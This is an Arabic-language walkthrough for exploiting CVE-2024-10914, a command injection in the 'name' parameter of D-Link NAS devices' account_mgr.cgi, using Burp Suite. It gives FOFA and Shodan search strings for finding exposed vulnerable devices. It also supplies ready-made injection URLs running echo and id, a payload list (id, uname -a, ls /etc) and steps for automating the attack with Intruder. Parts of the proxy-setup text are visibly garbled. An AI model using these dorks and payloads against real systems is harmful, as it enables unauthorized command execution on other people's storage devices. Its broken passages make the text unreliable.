
CVE-2024-10914_الاختبار اليدوي باستخدام burpsuite
استخدم dork البحثي التالي للعثور على أجهزة D-Link NAS التي قد تكون معرضة للخطر:
FOFA:
app="D_Link-DNS-ShareCenter" && server=="lighttpd/1.4.25-devel-fb150ff"
SHODAN:
"http.title:D-Link" product:"lighttpd"
تساعد سلسلة البحث هذه في تحديد الأجهزة التي تشغّل تطبيق D-Link DNS ShareCenter المعرض للخطر مع الإصدار المحدد من خادم Lighttpd المتأثر بالثغرة.
يقدم هذا الدليل إرشادات خطوة بخطوة حول كيفية الاختبار اليدوي لثغرة حقن الأوامر (CVE-2024-10914) في المعامل name لأجهزة D-Link NAS باستخدام Burp Suite. عنوان الهدف: http://Target.
127.0.0.1:8080)127.0.0.1 والمنفذ 8080.http://Target.تحديد موقع المعامل المعرض للخطر: في الطلب المعترض، ابحث عن المعامل name في عنوان URL. يجب أن يظهر بالشكل التالي:
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;...;%27
حقن أمر اختبار: عدّل المعامل name ليتضمن أمر اختبار مثل echo "test":
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;echo%20%22test%22;%27
إرسال الطلب المعدل: أرسل الطلب المعدل إلى الخادم.
فحص الاستجابة: ابحث عن مخرجات الأمر المحقون في الاستجابة. على سبيل المثال، إذا نفّذ الخادم echo "test"، يجب أن ترى:
test
حقن أمر خبيث: إذا نجح الاختبار، جرّب أوامر أكثر تطورًا، مثل:
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27
إرسال طلب الاستغلال: أرسل هذا الطلب إلى الخادم.
تحليل الاستجابة: تحقق مما إذا كانت مخرجات الأمر (مثل معلومات معرف المستخدم) موجودة في الاستجابة.
استخدام Intruder: أتمتة الاختبار باستخدام أداة Intruder الخاصة بـ Burp Suite.
name كموضع للحمولة.أمثلة على الحمولات:
echo "test"
id
uname -a
ls /etc
بدء Intruder: شغّل هجوم Intruder لاختبار حمولات متعددة تلقائيًا.